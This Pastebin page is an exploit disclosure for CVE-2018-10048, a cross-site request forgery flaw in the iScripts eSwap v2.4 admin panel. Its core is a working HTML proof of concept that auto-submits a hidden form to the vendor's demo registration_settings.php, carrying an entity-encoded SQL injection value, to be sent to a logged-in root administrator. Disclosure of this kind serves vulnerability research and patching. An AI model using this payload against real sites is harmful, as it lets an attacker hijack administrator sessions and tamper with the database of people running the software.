daily pastebin goal
63%
SHARE
TWEET

CVE-2018-10048

ManhNho Apr 11th, 2018 (edited) 131 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit title: iScripts eSwap v2.4 - CSRF via the registration_settings.php Admin Panel
  2. # Date: 11/04/2018
  3. # Exploit Author: ManhNho
  4. # Vendor Homepage: https://www.iscripts.com
  5. # Software Link: https://www.iscripts.com/eswap
  6. # Demo Link: https://www.demo.iscripts.com/eswap/demo//admin/adminmain.php
  7. # Version: 2.4
  8. # CVE: CVE-2018-10048
  9. # Tested on: Windows 10 / Kali Linux
  10. # Category: Webapps
  11.  
  12.  
  13. #1. Description
  14. -----------------------------------------------------
  15. iScripts eSwap v2.4 has CSRF via the "registration_settings.php" function parameter in Admin Panel.
  16.  
  17. #2. PoC
  18. -----------------------------------------------------
  19. a) Send below crafted request to logged in user who is having Root Administrator level access
  20.  
  21. <html>
  22.   <!-- CSRF PoC - ManhNho -->
  23.   <body>
  24.   <script>history.pushState('', '', '/')</script>
  25.     <form action="https://www.demo.iscripts.com/eswap/demo//admin/registration_settings.php?act=post" method="POST">
  26.       <input type="hidden" name="ddlFree" value="&#45;1&apos;&#32;order&#32;by&#32;0&#32;&#35;" />
  27.       <input type="hidden" name="txtDate" value="1" />
  28.       <input type="submit" value="Submit request" />
  29.     </form>
  30.   </body>
  31. </html>
  32.  
  33. b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
RAW Paste Data
Top